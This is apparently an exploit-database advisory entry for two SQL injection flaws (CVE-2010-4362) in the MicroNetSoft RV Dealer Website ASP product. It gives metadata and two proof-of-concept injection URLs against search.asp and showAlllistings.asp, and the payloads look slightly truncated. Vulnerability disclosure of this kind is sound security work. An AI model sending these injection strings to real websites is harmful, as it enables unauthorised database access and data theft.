[] NeoSense

MicroNetSoft RV Dealer Website - 'search.asp' / showAlllistings.asp' SQL Injection

Author: underground-stockholm.com
type: webapps
platform: asp
port: 
date_added: 2010-11-29 
date_updated: 2010-11-29 
verified: 1 
codes: CVE-2010-4362;OSVDB-69581;OSVDB-69580 
tags: 
aliases:  
screenshot_url:  
application_url: 

TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

SQL INJECTION BUGS:

http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union